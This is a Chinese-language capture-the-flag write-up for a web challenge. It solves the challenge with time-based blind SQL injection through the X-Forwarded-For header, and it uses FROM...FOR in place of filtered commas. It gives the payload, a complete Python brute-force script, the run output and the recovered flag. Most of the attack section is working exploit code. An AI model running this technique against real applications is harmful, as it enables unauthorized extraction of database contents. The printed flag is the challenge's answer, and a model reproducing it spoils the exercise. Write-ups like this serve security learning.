who are you
原题链接
http://ctf5.shiyanbar.com/web/wonderkun/index.php
我要把攻击我的人都记录db中去!
分析
一开始我也以为是X-Forword-For伪造IP那么简单,后来试了几次发现,虽然能改IP,但是没什么用。
才注意到将IP放入db的提示,怎么放,insert于是猜测,可能是insert into注入。
于是这个题其实和BugKu的一个题很像,不同的是这题的注入点在数据包请求头的XFF位置。
也是时间盲注,由于过滤的逗号,要用from for代替。
payload:
(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(5) else 1 end ) and '1'='1"
脚本如下:
# -*- coding:utf-8 -*-
import requests
import sys
import string
# 基于时间的盲注,过滤了逗号 ,
strset = string.ascii_letters+string.digits
sql = "127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
url = 'http://ctf5.shiyanbar.com/web/wonderkun/index.php'
flag = ''
for i in range(1, 40):
print('正在猜测:', str(i))
for ch in strset:
sqli = sql.format(i, ch)
#print(sqli)
header = {
'X-Forwarded-For': sqli
}
try:
html = requests.get(url, headers=header, timeout=6)
except:
flag += ch
print(flag)
break
运行结果:
正在猜测: 1
c
正在猜测: 2
cd
正在猜测: 3
cdb
...
cdbf14c9551d5be5612f7bb5d286
正在猜测: 29
cdbf14c9551d5be5612f7bb5d2867
正在猜测: 30
cdbf14c9551d5be5612f7bb5d28678
正在猜测: 31
cdbf14c9551d5be5612f7bb5d286785
正在猜测: 32
cdbf14c9551d5be5612f7bb5d2867853
flag
ctf{cdbf14c9551d5be5612f7bb5d2867853}
知识点
sql时间盲注,XFF,insert into注入
网友评论